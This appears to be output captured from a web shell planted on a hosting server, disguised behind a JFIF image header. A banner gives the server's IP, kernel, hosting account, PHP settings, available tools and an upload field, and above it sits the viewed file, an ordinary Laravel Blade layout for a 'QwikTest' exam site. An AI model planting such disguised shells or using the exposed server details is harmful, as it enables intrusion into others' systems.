����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.118.136.90 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/cbt.gltechlimited.com/resources/views/ |
Upload File : |
<!DOCTYPE html> <html dir="{{ app(\App\Settings\LocalizationSettings::class)->default_direction }}" lang="{{ str_replace('_', '-', app()->getLocale()) }}"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-token" content="{{ csrf_token() }}"> <title>{{ config('app.name', 'QwikTest') }}</title> <meta name="description" content="{{ app(\App\Settings\SiteSettings::class)->seo_description }}"> <link rel="icon" href="{{ url('storage/'.app(\App\Settings\SiteSettings::class)->favicon_path) }}"> <!-- Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link rel="stylesheet" href="{{ config('qwiktest.default_font_url') }}"> <!-- Styles --> <link rel="stylesheet" href="{{ asset('vendor/primeicons/primeicons.css') }}"> <link rel="stylesheet" href="{{ asset('vendor/nprogress/nprogress.css') }}"> <link rel="stylesheet" href="{{ asset('vendor/katex/katex.min.css') }}"> <link rel="stylesheet" href="{{ asset('css/app.css') }}"> <style> :root { /* Custom Theme Configuration */ --custom-font: "{{ config('qwiktest.default_font') }}"; --primary-color: {{ '#'.app(\App\Settings\ThemeSettings::class)->primary_color }}; --secondary-color: {{ '#'.app(\App\Settings\ThemeSettings::class)->secondary_color }}; } </style> <!-- Scripts --> @routes <script> window.CKEditorURL = "{{ asset('vendor/ckeditor/ckeditor.js') }}"; </script> <script src="{{ asset('vendor/katex/katex.min.js') }}"></script> <script src="{{ asset('vendor/katex/contrib/auto-render.min.js') }}"></script> <script src="{{ asset('js/manifest.js') }}" defer></script> <script src="{{ asset('js/vendor-vue.js') }}" defer></script> <script src="{{ asset('js/vendor.js') }}" defer></script> <script src="{{ asset('js/app.js') }}" defer></script> </head> <body class="font-sans antialiased bg-gray-100 dark:bg-gray-900"> @inertia </body> </html>